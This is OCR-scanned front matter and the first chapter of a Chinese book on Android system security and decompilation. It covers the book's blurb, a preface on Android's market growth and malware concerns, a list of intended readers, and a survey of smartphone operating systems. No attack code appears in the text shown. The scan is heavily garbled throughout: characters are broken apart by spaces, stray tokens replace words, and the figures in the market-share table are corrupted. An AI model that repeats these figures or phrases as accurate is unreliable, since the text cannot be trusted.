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Android 
系统 安全 和 上 反 编 译 实战 


d$ 实录 460 分 钟 、102 个 系统 安全 高 清 学 习 视 频 。 
© 教授 精髓 ， 多 角度 剖析 Android 的 安全 机 制 和 实现 原理 。 
© 2 个 大 型 综合 案例 ， 与 实际 开发 过 程 可 无 颖 对 接 。 
Ф 全 面 、 详 尽 、 实 用 的 安全 解决 方案 。 赠 送 源码 ， 拿 来 就 用 。 


$ 15 个 Android 综 合 项 目 开发 案例 
DVD 总 38 个 Android 应 用 开发 学 习 视 频 
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Android 系统 从 诞生 到 现在 ， 在 短 短 几 年 时 间 里 ， 和 凭借 其 操作 易 用 性 和 开发 的 简洁 性 ， 赢 得 了 广大 用 户 和 开发 者 的 
支持 。 截 至 2014 年 Н 30 H, Android 系统 的 市 场 占有 率 高 达 85%。 本 书 内 容 分 为 4 篇 ， 共 计 22 个 章节 ， 循 序 渐进 
地 讲解 了 Android 系统 安全 分 析 和 破解 实战 的 基本 知识 。 本 书 从 搭建 应 用 开发 环境 开始 讲 起 ， 依 次 讲解 了 基础 知识 篇 、 
系统 安全 架构 篇 、 安 全 攻防 篇 、 综 合 实战 篇 这 四 大 部 分 的 内 容 。 在 讲解 每 一 个 知识 点 时 ， 都 遵循 了 理论 联系 实际 的 讲解 
方式 ， 从 内 核 分 析 到 安全 架构 实现 ， 再 到 加 壳 、 解 过 、 反 编译 和 漏洞 解析 ， 最 后 到 综合 实例 演练 ， 彻 底 剖 析 了 Android 
系统 安全 分 析 和 破解 的 所 有 知识 点 。 本 书 涵盖 了 Android 系统 安全 分 析 和 破解 的 主要 内 容 ， 讲 解 详细 并 且 通 俗 易 懂 ， 不 
但 适合 高 手 们 的 学 习 ， 也 特别 有 利于 初学 者 学 习 并 消化 。 

本 书 适合 Android 安全 架构 者 、Linux 开发 人 员 、 系 统 安全 人 员 、Android 源码 分 析 人 员 、Android 应 用 开发 人 员 和 
从 事 Android 等 移动 设备 安全 工作 的 人 员 学 习 , 也 可 以 作为 相关 培训 学 校 、 大 专 院 校 和 杀毒 软件 公司 的 教学 及 培训 用 书 。 
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2007 ££ 11 月 5 日 , 谷歌 公司 宣布 基于 Linux 平台 的 开源 手机 操作 系统 Android 诞生 ， 该 平台 号 称 是 
首 个 为 移动 终端 打造 的 真正 开放 和 完整 的 移动 软件 。 本 书 将 和 广大 读者 共同 领略 这 款 系统 的 神奇 之 处 。 


市 场 占 有 率 高 居 第 一 


截至 2014 年 9 H, Android 在 手机 市 场 上 的 占有 率 从 2013 年 的 68.8% 上 升 到 85%， 而 iOS WA 
19.4% 下 降 到 15.5%，WP 系统 从 原来 的 2.7% 小 幅 上 升 到 3.6%。 从 数据 上 看 ，Android 平台 占据 了 市 场 
的 主导 地 位 。 

就 目前 来 看 ， 智 能 手机 的 市 场 已 经 饱和 ， 大 多 数 用 户 在 各 个 平台 中 转换 。 而 就 在 这 样 一 个 市 场 上 ， 
Android 还 增长 了 10% 左 右 的 占有 率 确实 不 易 。 


为 开发 人 员 提 供 了 “平台 ” 


(1) 保证 开发 人 员 可 以 迅速 转型 为 Android 应 用 开发 

Android 应 用 程序 是 通过 Java 语言 开发 的 ， 只 要 具备 Java 开发 基础 ， 就 能 很 快 上 手 并 掌握 。 作 为 
单独 的 Android 应 用 开发 ， 对 Java 编程 门槛 的 要 求 并 不 高 ， 即 使 没有 编程 经 验 ， 在 突击 学 习 Java 之 后 
也 可 以 学 习 Android。 另 外 ，Android 完全 支持 2D、3D 和 数据 库 ， 并 且 和 浏览 器 实现 了 集成 。 所 以 通 
过 Android 平台 ， 程 序 员 可 以 迅速 、 高 效 地 开发 出 绚丽 多 彩 的 应 用 ， 例 如 常见 的 工具 、 管 理 、 互 联网 
和 游戏 等 。 

(2) 定期 举行 奖金 丰厚 的 Android 大 赛 

为 了 吸引 更 多 的 用 户 使 用 Android 开发 ， 谷 歌 已 经 成 功 举办 了 奖金 为 数 千 万 美元 的 开发 者 竞赛 ， 
鼓励 开发 人 员 创 建 出 创意 十 足 、 十 分 有 用 的 软件 。 这 种 大 赛 对 于 开发 人 员 来 说 ， 不 但 能 练习 自己 的 开 
发 技术 ， 高 额 的 奖金 也 是 学 员 们 学 习 的 动力 。 

(3) 开发 人 员 可 以 利用 自己 的 作品 赚钱 

为 让 Android 平台 吸引 更 多 用 户 ， 谷 歌 提供 了 一 个 专门 下 载 Android 应 用 的 门店 Android Market, 
地 址 是 https://play.google.com/store。 该 门店 中 允许 开发 人 员 发 布 应 用 程序 , 也 允许 Android JA Fak A 
己 喜 欢 的 程序 。 作 为 开发 者 ， 需 要 申请 开发 者 账号 ， 申 请 后 才能 将 自己 的 程序 上 传 到 Android Market, 
并 且 可 以 对 自己 的 软件 进行 定价 。 只 要 所 编写 的 软件 程序 足够 吸引 人 ， 就 可 以 获得 很 好 的 金钱 回报 ， 
实现 了 程序 员 学 习 和 赚钱 两 不 误 ， 所 以 吸引 了 更 多 开发 人 员 加 入 到 Android 大 军 中 来 。 


Android 安全 隐患 日 益 突出 


Android 系统 的 诞生 伴随 着 手机 的 安全 问题 , Android 系统 的 开源 性 势必 会 带 来 一 系列 的 安全 问题 ， 
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但 也 正 因为 开源 性 才 可 以 让 用 户 有 自由 创造 和 发 挥 的 空间 。 对 于 普通 手机 用 户 来 说 ，Android 的 安全 性 
是 让 人 担心 的 问题 。Android 不 安全 的 因素 主要 来 源 于 恶意 软件 ,因此 对 于 用 户 来 说 如 何 防止 恶意 软件 
的 入 侵 才 是 首要 问题 。 笔 者 从 研究 学 习 Android 安全 方面 的 知识 ， 到 从 事 相 关 工作 ， 已 经 度 过 了 4 年 
的 时 光 。 在 这 4 年 当中 ， 见 到 了 形形色色 的 病毒 和 木马 ， 也 无 数 次 听 到 过 被 攻击 者 的 诉苦 。 正 因 如 此 ， 
笔者 才 立 志 写 一 本 系统 的 、 完 整 的 Android 安全 方面 的 书籍 。 


本 书 的 内 容 


本 书 内 容 分 为 4 篇 , 共计 22 章 , 循序 渐进 地 讲解 了 Android 系统 安全 分 析 和 破解 实战 的 基本 知识 。 
本 书 从 搭建 应 用 开发 环境 开始 讲 起 ， 依 次 讲解 了 基础 知识 篇 、 系 统 安全 架构 篇 、 安 全 攻防 篇 、 综 合 实 
战 篇 这 四 大 部 分 的 内 容 。 在 讲解 每 一 个 知识 点 时 ， 都 遵循 了 理论 联系 实际 的 讲解 方式 ， 从 内 核 分 析 到 
安全 架构 实现 ， 再 到 加 克 、 解 壳 、 反 编译 和 漏洞 解析 ， 最 后 到 综合 实例 演练 ， 彻 底 剖 析 了 Android £ 
统 安全 分 析 和 破解 的 所 有 知识 点 。 本 书 几乎 涵盖 了 所 有 Android 系统 安全 分 析 和 破解 的 主要 内 容 ， 讲 
解 方法 详细 且 通 俗 易 懂 ， 不 但 适合 高 手 们 的 学 习 ， 也 特别 有 利于 初学 者 学 习 和 消化 。 


致 读者 的 话 


Android 安全 方面 的 知识 博大 精深 ， 不 仅 包括 基本 的 底层 开发 和 顶层 Java 应 用 开发 ， 还 包括 反 编 
译 和 漏洞 分 析 的 技术 能 力 ， 并 且 还 要 求 从 业 人 员 有 具备 可 以 制作 自己 的 操作 工具 的 能 力 。 这 要 求 从 业 人 
员 不 但 要 具备 Java, C 和 C++ 的 知识 ， 还 需要 具备 ARM 逆向 分 析 和 汇编 开发 的 能 力 。 更 重要 的 是 ， 
Android 从 业 人 员 还 必须 拥有 勇于 探索 和 不 怕 失 败 的 信念 。 

笔者 从 2008 年 接触 Android 系统 开始 ， 经 历 了 Android 应 用 开发 、 源 码 分 析 、 底 层 架构 学 习 。 后 
来 因为 加 入 了 360 团队 ， 所 以 开始 研究 学 习 Android 安全 的 知识 。 开 始 的 学 习 是 枯燥 无 味 的 ， 幸 好 有 
家 人 、 朋 友和 同事 的 鼓励 ， 才 得 以 坚持 下 去 。 作 为 一 名 “过 来 人 ”， 对 广大 初学 者 提出 如 下 建议 。 

(OD 建立 信心 

什么 是 自信 ， 我 认为 我 现在 想 做 到 某 件 事 ， 然 后 通过 努力 做 到 了 ， 这 就 是 自信 的 建立 。 都 说 信心 是 
成 功 的 关键 ， 学 习 计算 机 技术 也 是 如 此 。 只 要 建立 “一 定 能 学 好 Android 安全 ”的 信心 ， 就 一 定 能 成 功 。 

(2) 稳扎稳打 

稳扎稳打 ， 意 思 是 稳当 而 有 把 握 地 打仗 ， 比 喻 有 把 握 、 有 步骤 地 工作 。 学 习 计算 机 技术 更 是 需要 
“稳扎稳打 ， 步 步 为 营 ”。 开 发 技术 的 学 习 不 能 速成 ， 没 有 捷径 。 在 每 一 个 知识 点 都 彻底 融会 贯通 后 ， 
才能 去 学 习 下 一 个 知识 点 。 

(3) 多 交流 

闭门造车 只 会 延误 学 习 的 进度 。 随 着 互联 网 的 普及 ， 各 大 学 习 论 坛 为 程序 学 习 者 提供 了 交流 的 平 
台 ， 以 和 广大 志同道合 的 朋友 们 共同 探索 、 共 同 进 步 。 笔 者 在 学 习 伊始 ， 经 常 光顾 看 雪 论坛 、 开 源 中 
安全 模块 、 吾 爱 破解 等 论坛 ， 里 面 的 朋友 热情 大 方 ， 不 但 共享 了 很 多 学 习 资 料 和 工具 ， 高 手 们 还 经 
常 抽出 宝贵 的 时 间 耐 心 解 答 别人 的 问题 。 感 谢 这 些 学 习 资源 论坛 ， 感 谢 过 去 四 年 的 陪伴 ， 使 我 的 学 习 
过 程 不 再 枯燥 乏味 。 

看 雪 论 坛 : http://bbs.pediy.com/。 

开源 中 国 社区 : http://www.oschina.net/. 
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吾 爱 破解 论坛 : http:/www.52pojie.cn/。 
本 书 特色 


本 书 编写 的 目标 是 通过 一 本 图 书 提供 多 本 图 书 的 价值 ， 读 者 可 以 根据 自己 的 需要 有 选择 地 阅读 。 
在 内 容 的 编写 上 ， 本 书 具 有 以 下 特色 。 

CD 内 容 全 面 ， 讲 解 细致 

本 书 几乎 涵盖 了 Android 系统 安全 分 析 和 破解 实战 所 需要 的 所 有 主要 知识 点 ， 详 细 讲解 了 每 一 个 
安全 项 目的 实现 过 程 和 具体 移植 方法 。 每 一 个 知识 点 都 力求 用 翔实 和 易 懂 的 语言 展现 在 读者 面前 。 

(2) 遵循 合理 的 主线 进行 讲解 

为 使 读者 彻底 弄 清 楚 Android 系统 安全 分 析 和 破解 的 各 个 知识 点 ,在 讲解 每 一 个 知识 点 时 , Linux 
内 核 开 始 讲 起 ， 依 次 剖析 了 底层 架构 原理 、 漏 洞 分 析 、 反 编译 和 具体 安全 策略 的 知识 。 遵 循 了 从 底层 
到 顶层 ， 实 现 了 Android 系统 安全 分 析 和 破解 开发 大 揭秘 的 目标 。 

(3) 章节 独立 ， 自 由 阅读 

本 书 中 的 每 一 章 内 容 都 可 以 独自 成 书 ， 读 者 既 可 以 按照 本 书 编排 的 章节 顺序 进行 学 习 ， 也 可 以 根 
据 自 己 的 需求 对 某 一 章节 进行 针对 性 学 习 。 与 传统 的 计算 机 书籍 相 比 ， 阅 读本 书 会 带 来 更 多 乐趣 。 

(4) 实例 典型 ， 实 用 性 强 

本 书 讲解 了 现实 中 最 常用 的 Android 系统 安全 和 破解 项 目的 实现 方法 和 架构 技巧 ， 这 些 经 典 应 用 
都 是 在 商业 项 目 中 最 需要 的 部 分 ， 读 者 可 以 直接 将 本 书 中 的 知识 应 用 到 自己 的 项 目 中 ， 实 现 无 颖 对 接 。 

(5) 附 配 资源 丰富 

本 书 配 有 丰富 的 学 习 资源 ， 除 源 代 码 、PPT 之 外 ， 还 实录 了 102 个 高 清 学 习 视 频 ， 既 有 实用 的 知 
识 点 讲解 视频 ， 也 有 详细 的 实例 开发 视频 。 除 此 以 外 ， 本 书 额外 赠送 了 38 个 Android 应 用 开发 学 习 视 
Hi, UK 15 个 Android 应 用 开发 综合 案例 ， 包 括 仿 小 米 录 音 机 、 音 乐 播放 器 、 跟 踪 定 位 系统 、 仿 陌 陌 
交友 系统 、 手 势 音乐 播放 器 、 智 能 家 居 系 统 、 湿 度 测试 仪 、 象 棋 游戏 、 抢 滩 登 陆游 戏 、 九 宫 格 数 独 游 
戏 、 健 康 饮 食 系统 、 仓 库 管 理 系统 、 个 人 财务 系统 、 仿 去 哪儿 酒店 预定 系统 、 仿 开心 网 客户 端 等 。 通 
过 这 些 附 配 资源 ， 读 者 的 学 习 过 程 会 更 加 方便 、 快 捷 。 


读者 对 象 


Android 安全 架构 人 员 。 

网 络 安全 人 员 。 

手机 杀毒 软件 工作 人 员 。 
初学 Android 编程 的 自学 者 。 
Linux 开发 人 员 。 

大 中 专 院 校 的 老师 和 学 生 。 
毕业 设计 的 学 生 。 
Android 编程 爱好 者 。 

相关 培训 机 构 的 老师 和 学 员 。 
从 事 Android 开发 的 程序 员 。 
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参与 本 书 编写 的 人 员 还 有 周秀 、 付 松柏 、 邓 才 兵 、 钟 世 礼 、 谭 贞 军 、 张 加 春 、 王 教 明 、 万 春 潮 、 
郭 慧玲 、 侯 恩 静 、 程 娟 、 王 文忠 、 陈 强 、 何 子夜 、 李 天 祥 、 周 锐 、 朱 桂 英 、 张 元 亮 、 张 韶 青 、 秦 丹 枫 。 
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第 1 章 Android 系统 介绍 


2007 年 ，Google 公司 推出 了 一 款 无 与 伦比 的 移动 智能 设备 系统 一 一 Android， 这 是 一 种 建立 在 Linux 基 
础 之 上 的 为 手机 、 平板 等 移动 设备 提供 的 软件 解决 方案 。 截至 2014 4E 9 H, 根据 知名 IDC 公司 的 统计 ， 
Android 系统 在 世界 智能 手机 发 货 量 中 占据 85% 的 份额 ， 已 经 成 为 当今 最 受 欢 迎 的 智能 设备 系统 之 一 。 本 章 
将 引领 读者 一 起 来 了 解 Android 系统 的 发 展 历程 和 背景 ， 充 分 体验 这 款 操作 系统 的 成 功 之 处 。 


1.1 纵览 智能 设备 系统 


бы 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 1 章 \ 纵 览 智能 设备 系统 .avi 

在 当今 市 面 中 有 很 多 智能 手机 系统 ， 在 Android 推出 之 前 ， 智 能 手机 系统 领域 塞 班 、 苹 果 、 微 软 互 不 相 
让 ， 三 足 易 立 之 势 日 渐 明 显 。 最 受 大 家 欢迎 的 当 属 微软 、 塞 班 、PDA、 黑 攻 、 蔷 果 和 本 书 的 主角 Android, 
本 节 将 一 一 讲解 这 些 手 机 智能 系统 的 知识 。 


1.1.1 上 昨日 皇 者 一 一 Symbian (EHE) 
Symbian 作为 昔日 智能 手机 的 王者 ， 在 2005—2010 年 曾 一 度 风 骚 ， 街 上 很 多 都 是 诺基亚 的 Symbian F 


机 ，N70、N73、N78、N97， 诺 基 亚 N 系列 曾经 被 称 为 “N= 无 限 大 ”的 手机 。 对 硬件 的 要 求 低 、 操 作 简 单 、 
省 电 、 软 件 资源 多 是 Symbian 系统 手机 的 重要 特点 。Symbian 系统 标志 如 图 1-1 


所 示 。 
在 国内 软件 开发 市 场 内 ， 基 本 每 一 个 软件 都 会 有 对 应 的 塞 班 手机 版 本 。 而 symbian 
寨 班 开发 之 初 的 目的 是 要 保证 在 较 低 资源 的 设备 上 能 长 时 间 稳 定 可 靠 地 运行 ， OS 
这 导致 了 塞 班 的 应 用 程序 开发 有 着 较为 陡峭 的 学 习 曲 线 ， 开 发 成 本 较 高 。 但 是 图 1-1 Symbian 系统 标志 
程序 的 运行 效率 很 高 。 例 如 5800 的 128MB [I] RAM, 后 台 可 以 同时 运行 十 儿 个 
程序 而 操作 依旧 流畅 (多 任务 功能 是 特别 强大 的 ) ， 即 使 几 天 不 关机 ， 其 剩余 内 存 也 会 保持 稳定 。 

TE Android. iOS 的 围攻 之 下 , 诺基亚 仍然 推出 了 塞 班 3 系统 , 甚至 为 其 更 新 (Symbian Anna, Symbian Belle), 
从 外 在 的 用 户 界面 到 内 在 的 功能 特性 都 有 了 显著 提升 ， 例 如 ， 可 自由 定制 的 全 新 窗 体 部 件 、 更 多 主屏 、 全 
新 下 拉 式 菜单 等 。 

由 于 对 新 兴 的 社交 网 络 和 Web 2.0 内 容 支 持 欠 佳 ， 塞 班 占 智能 手机 的 市 场 份额 日 益 萎 缩 。2010 ER, 
其 市 场 占有 量 已 被 Android Hit. A 2009 年 底 开 始 ， 包 括 摩托 罗拉 、 三 星 、LG、 索 尼 爱 立信 等 各 大 厂商 纷 
纷 宣布 终止 塞 班 平台 的 研发 ， 转 而 投入 Android 领域 。2011 年 初 ， 诺 基 亚 宣布 将 与 微软 成 立 战 略 联盟 ， 推 
出 基于 Windows Phone 的 智能 手机 ， 从 而 在 事实 上 放弃 了 经 营 多 年 的 塞 班 ， 塞 班 退 市 已 成 定局 。 


1.1.2 ”高 贵 华丽 一 一 iOS 


iOS 作为 苹果 移动 设备 iPhone 和 iPad 的 操作 系统 , 在 App Store 的 推动 之 下 , 成 为 了 世界 上 引领 潮流 的 


sie aodare ООП 


操作 系统 之 一 。 原 本 这 个 系统 名 为 iPhone OS， 直 到 2010 年 6 月 7 日 WWDC 大 会 上 


宣布 改名 为 iOS。 iOS 用 户 界面 的 概念 基础 上 是 能 够 使 用 多 点 触 控 直 接 操作 。 控制 方法 O 
包括 滑动 、 轻 触 开 关 及 按键 。 与 系统 交互 包括 滑动 (Swiping) 、 轻 按 (Tapping)、 挤 / ( 


Ж (Pinching， 通 常用 于 缩小 ) 及 反 向 挤 压 (Reverse Pinching or Unpinching， 通 常用 于 [ 
WA) 。 此 外 ， 通 过 其 自 带 的 加 速 器 ， 可 以 令 其 旋转 设备 改变 其 у 轴 以 令 屏 幕 改 变 方 74 
向 ， 这 样 的 设计 使 iPhone 更 便于 使 用 。iOS 系统 标志 如 图 1-2 所 示 。 AC 
O iPhone OS 1.0: 最 早 版 本 ， 内 置 于 iPhone 一 代 手 机 里 ， 借 助 iPhone 流畅 的 触摸 
屏幕 ，iPhone OS 给 用 户 带 来 了 极为 优秀 的 使 用 体验 ， 相 比 当时 的 手机 可 以 用 
惊艳 来 形容 。 

O iPhone OS 2.0: 随 着 iPhone 3G 的 发 布 ，App Store 诞 生 。App Store 为 第 三 方 软件 的 提供 者 提供 了 方 

便 而 又 高 效 的 软件 销售 平台 , 在 软件 开发 者 与 最 终 用 户 之 间架 起 了 一 座 沟通 与 销售 的 桥梁 ， 从 而 极 
大 地 丰富 了 iPhone 手机 功能 应 用 。 

口 iPhone OS 3.0: iPhone 3GS 开 始 支持 复制 、 粘 贴 功 能 。 

Q iOS 4: 在 iPhone4 推 出 时 ， 苹 果 决 定 将 原来 iPhone OS 系统 重新 定名 为 OS， 并 发 布 新 一 代 操作 系统 

iOS 4。 该 版 本 开始 正式 支持 多 任务 功能 ， 通 过 双击 HOME 键 实 现 。 

口 1055: 加 入 了 Siri 语 音 操作 助手 功能 ， 用 户 可 以 用 手机 实现 语言 上 的 人 机 交互 ， 该 功能 可 以 实现 对 

用 户 的 语音 识别 ， 完 成 一 些 较为 复杂 的 操作 ， 使 用 Siri 来 查询 天 气 、 进 行 导航 、 询 问 时 间 、 设 定 闹 
钟 、 查 询 股票 甚至 发 送 短信 等 功能 ， 方 便 了 用 户 的 使 用 。 

从 最 初 的 iPhone OS, 演变 至 最 新 的 iOS 系统 , iOS 成 为 了 苹果 新 的 移动 设备 操作 系统 , 横 跨 iPod Touch, 
iPad、iPhone， 成 为 苹果 最 强大 的 操作 系统 ， 甚 至 新 一 代 的 Mac OS X Lion 也 借鉴 了 105 系统 的 一 些 设计 ， 
可 以 说 iOS 是 苹果 的 又 一 个 成 功 的 操作 系统 ， 能 给 用 户 带 来 极 佳 的 使 用 体验 。 

优秀 系统 设计 以 及 严格 的 App Store, iOS 作为 应 用 数量 最 多 的 移动 设备 操作 系统 ， 加 上 强大 的 硬件 支 
持 以 及 iOS 5 内 置 的 Siri 语音 助手 ， 无 疑 使 得 用 户 体验 得 到 更 大 的 提升 ， 使 用 户 感受 科技 带 来 的 优势 。 


1.1.3 ”全 新 面貌 一 一 Windows Phone 


图 1-2 iOS 系统 标志 


FLZE 2004 年 时 ,微软 就 开始 以 Photon 的 计划 代号 研发 Windows Mobile 的 一 个 重要 版 本 更 新 。 直 到 2008 
tE, TE iOS Il Android 的 巨大 冲击 之 下 ， 微 软 重 新 组 织 了 Windows Mobile 的 小 组 ， 并 继续 开发 一 个 新 的 行 
动 操作 系统 一 一 Windows Phone， 其 标志 如 图 1-3 所 示 。 

Windows Phone， 简 称 WP， 是 微软 发 布 的 一 款 手机 操作 系统 ， 它 将 微软 旗下 的 Xbox Live 游戏 、Xbox 
Music 音乐 与 独特 的 视频 体验 集成 至 手机 中 。 微 软 公司 于 2010 年 10 月 11 日 21 点 30 分 正式 发 布 了 智能 手 
机 操作 系统 Windows Phone， 并 将 其 使 用 接口 称 为 Modern 接口 。2011 年 2 月 ， 诺 基 亚 与 微软 达成 全 球 战略 
同盟 并 深度 合作 共同 研发 。2011 年 9 月 27 日 ， 微 软 发 布 Windows Phone 7.5。2012 年 6 月 21 日 ,微软 正式 
发 布 Windows Phone 8, 采用 和 Windows 8 相同 的 Windows NT 内 核 , 同时 也 针对 市 场 的 Windows Phone 7.5 
发 布 Windows Phone 7.8。 现 有 Windows Phone 7 手机 都 将 无 法 升级 至 Windows Phone 8。 

Windows Phone 系统 操作 界面 风格 如 图 1-4 所 示 。 具 有 桌面 定制 、 图 标 拖 搜 、 滑 动 控制 等 一 系列 前 卫 的 
操作 体验 。 其 主屏 幕 通过 提供 类 似 仪表 盘 的 体验 来 显示 新 的 电子 邮件 、 短 信 、 未 接 来 电 、 日 历 约 会 等 ， 让 
人 们 对 重要 信息 保持 时 刻 更 新 。 它 还 包括 一 个 增强 的 触摸 屏 界面 ， 更 方便 手指 操作 :以 及 一 个 最 新 版 本 的 
IE Mobile 浏览 器 一 一 该 浏览 器 在 一 项 由 微软 赞助 的 第 三 方 调查 研究 中 ， 与 参与 调研 的 其 他 浏览 器 和 手机 相 
比 ， 可 以 执行 指定 任务 的 比例 超过 48%。 很 容易 看 出 微软 在 用 户 操作 体验 上 所 做 出 的 努力 ， 而 史 蒂 夫 。 鲍 
尔 默 也 表示 : “全 新 的 Windows 手机 把 网 络 、 个 人 计算 机 和 手机 的 优势 集 于 一 身 ， 让 用 户 可 以 随时 随地 享 


受到 想 要 的 体验 。” 
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Windows Phone， 力 图 打破 人 们 与 信息 和 应 用 之 间 的 隔 头 ， 提 供 适 用 于 用 户 的 ， 包 括 工作 和 娱乐 在 内 完 
整 生活 的 方方面面 ， 最 优秀 的 端 到 端 体验 。 


1.1.4 高 端 商务 一 一 BlackBerry OS (黑莓 ) 


BlackBerry 系统 是 加 拿 大 Research In Motion (HJEK RIM) 公司 推出 的 一 种 无 线 手持 邮件 解决 终端 设备 
的 操作 系统 ， 由 RIM 自主 开发 。 与 其 他 手机 终端 使 用 的 Symbian, Windows Mobile. iOS 等 操作 系统 有 所 不 
同 ，BlackBerry 系统 的 加 密 性 能 更 强 ， 更 安全 。 该 系统 标志 如 图 1-5 所 示 。 

安装 有 BlackBerry 系统 的 黑莓 机 ， 不 单单 指 一 台 手 机 ， 而 是 由 RIM 公司 SSs 
所 推出 ， 包 含 服务 器 〈 邮 件 设 定 ) 、 软 件 〈 操 作 接口 ) 以 及 终端 手机) 大 BlackBerry. 
类 别 的 Push Mail 实时 电子 邮件 服务 。 图 1-5 BlackBerry 系统 标志 

“MAE” (BlackBerry) 移动 邮件 设备 基于 双向 寻 呼 技术 。 该 设备 与 RIM 
公司 的 服务 器 相 结合 ， 依 赖 于 特定 的 服务 器 软件 和 终端 ， 兼 容 现 有 的 无 线 数据 链 路 ， 实 现 了 遍及 北美 、 随 
时 随地 收发 电子 邮件 的 梦想 。 这 种 装置 并 不 以 奇妙 的 图 片 和 彩色 屏幕 夺 人 耳目 ， 甚 至 不 带 发 声 器 。“9。11 
事件 ”之 后 ， 由 于 BlackBerry 及 时 传递 了 灾难 现场 的 信息 ， 因 而 在 美国 掀起 了 “拥有 一 部 BlackBerry 终端 ” 
的 热潮 。 

黑 侮 赖 以 成 功 的 最 重要 原则 是 针对 高 级 白领 和 企业 人 士 ， 提 供 企业 移动 办 公 的 一 体 化 解决 方案 。 企 业 
有 大 量 的 信息 需要 即时 处 理 ， 出 差 在 外 时 ， 也 需要 一 个 无 线 的 可 移动 的 办 公设 备 。 企 业 只 要 装 一 个 移动 网 
关 ， 一 个 软件 系统 ， 用 手机 的 平台 实现 无 缝 链接， 无 论 何 时 何 地 ， 员 工 都 可 以 用 手机 进行 办 公 。 最 大 方便 
之 处 是 提供 了 邮件 的 推送 功能 ， 即 由 邮件 服务 器 主动 将 收 到 的 邮件 推送 到 用 户 的 手持 设备 上 ， 而 不 需要 用 
户 频繁 地 连接 网 络 查看 是 否 有 新 邮件 。 

黑 侮 系统 稳定 性 非常 优秀 ， 其 独特 定位 也 深 得 商务 人 士 青睐 ， 但 也 因此 在 大 众 市 场 上 不 占 优势 ， 国 内 
用 户 和 应 用 资源 也 较 少 。 
背景 说 明 : 


(1) 2010 年 9 月 ， 诺 基 亚 宣布 将 从 2011 年 4 月 起 从 Symbian 基金 会 (Symbian Foundation) 手中 收回 Symbian 操作 系 
统 控制 权 。 由 此 看 来 ， 诺 基 亚 在 2008 年 全 资 收购 塞 班 公司 之 后 希望 继续 扩大 塞 班 影响 力 的 愿望 并 没有 实现 。 

(2) 在 苹果 和 Android 的 强大 市 场 攻势 下 ， 诺 基 亚 在 2011 年 2 月 11 日 宣布 与 微软 达成 广泛 战略 合作 关系 ， 并 将 
Windows Phone 作为 其 主要 的 智能 手机 操作 系统 。 这 家 芬兰 手机 巨头 试图 通过 结盟 捏 转 阁 势 。 

(3) 2011 年 8 月 15 日 , 谷歌 和 摩托 罗拉 移动 公司 共同 宣布 ,谷歌 将 以 每 股 40.00 美元 现金 收购 摩托 罗拉 移动 ， 总 额 约 


e 


125 亿美 元 ， 相 比 摩托 罗拉 移动 股份 的 收盘 价 溢价 了 63%， 双 方 董事 会 都 已 全 票 通过 该 交易 。 谷歌 CEO RE -M 
奇 表示 ， 摩 托 罗拉 移动 完全 专注 于 Android 系统 ， 收 购 摩托 罗拉 移动 之 后 ， 将 增强 整个 Android 生态 系统 。 佩 奇 
同时 表示 ，Android 将 继续 开源 ， 收 购 的 一 个 目的 是 为 了 获得 专利 。 

(4) 2013 年 9 月 3 日， 微软 公司 宣布 将 以 37.9 亿 欧元 的 价格 收购 诺基亚 的 设备 和 服务 部 门 ， 同 时 还 将 以 16.5 亿 欧 元 
的 价格 收购 诺基亚 的 相关 技术 专利 ， 本 次 交易 总 额 达到 54.4 亿 欧元 ， 其 中 有 3.2 万 名 员工 将 从 诺基亚 转 入 微软 ， 
整 笔 交易 预计 于 2014 年 第 一 季度 完成 。 

(5) 2013 年 9 月 24 日 消息 ， 黑 莓 表示 已 经 与 由 Fairfax Financial Holdings 主导 的 财团 达成 交易 ， 准 备 以 47 亿美 元 出 售 ， 
但 是 后 来 没有 任何 爆炸 性 消息 发 布 。 


1.1.5 ”本 书 的 主角 一 一 Android 


Android 一 词 最 早出 现 于 法 国 作家 利 尔 亚当 (Auguste Villiers de l'Isle-Adam) 在 1886 年 发 表 的 科幻 小 说 
《未 来 夏娃 》 (L'ève future) 中 ， 他 将 外 表 像 人 的 机 器 起 名 为 Android, Android 
系统 标志 如 图 1-6 所 示 。 

А 2008 年 HTC 和 Google 联手 推出 第 一 台 Android 手机 СІ 开始 ，Android Ж 
统 已 经 经 过 了 多 个 版 本 的 发 展 。2014 年 10 月 15 日 〈 美 国 太平 洋 时 间 ) , Google 
公司 发 布 了 全 新 Android 操作 系统 一 Android 5.0。 北 京 时 间 2014 年 6 月 26 日 0 1023015 
IN, Google VO 2014 开发 者 大 会 在 旧金山 正式 召开 ， 发 布 了 Android 5.0 的 前 身 L 图 1-6 Android 系统 标志 

(Lollipop) 版 Android 开发 者 预览 版 本 。 今年 的 三 款 新 Nexus. 设备 一 一 Nexus 6、 
Nexus 9 平板 及 Nexus Player 将 率先 搭载 Android 5.0， 之 前 的 Nexus 5, Nexus 7 及 Nexus 10 将 会 很 快 获得 
更 新 ， 而 Google Play 版 设备 则 需要 等 上 儿 周 才能 升级 。 

2014 年 8 月 15 日 消息 ， 根据 IDC 发 布 的 2014 年 第 二 季度 智能 手机 市 场 的 最 新 数据 显示 ， 苹 果 iOS 和 
谷歌 Android 两 大 系统 平台 继续 领跑 。Android 阵营 增长 则 更 惊人 ， 达 到 了 33.3%， 出 货 量 达 到 了 2.553 亿 
f. Android 系统 的 市 场 份额 得 到 了 提高 ， 从 2013 第 二 季度 的 79.6% 增 长 到 了 2014 第 二 季度 的 84.7%. A 
体 信 息 如 图 1-7 所 示 。 


Top Five Smartphone Operating Systems, Worldwide Shipments, and 
Market Share, 201402 (Units in Millions) - IDC/Applelnsidor 
Q22014 022014 022013 022013  Year- 
Shipment Market Shipment Market Over-Yoar 
Volume Share Volume Share Growth 
Operating System 
Android 2553 Ва? 191.5 796% 333% 


ios 352 1.7% 312 130% 127% 
Windows Phone ТА 25% 82 34% -94% 
BlackBerry 15 05% 67 28% -780% 
Others 1 0.6% 29 12% -322% 
Total 3013 100.0% — 2405 100.0% — 25.3% 


1-7 2014 年 8 月 智能 手机 平台 调查 表 


由 此 可 见 ，Android 系统 的 市 场 占 有 率 位 居 第 一 ， 并 且 毫 无 压力 。Android 机 型 数量 庞大 ， 简 单 易 用 ， 
相当 自由 的 系统 能 让 厂商 和 客户 轻松 定制 各 样 的 ROM， 定 制 各 种 桌面 部 件 和 主题 风格 。 简 单 而 华丽 的 界面 
得 到 广大 客户 的 认可 ， 对 手机 进行 刷机 也 是 不 少 Android 用 户 所 津津 乐 道 的 事情 。 

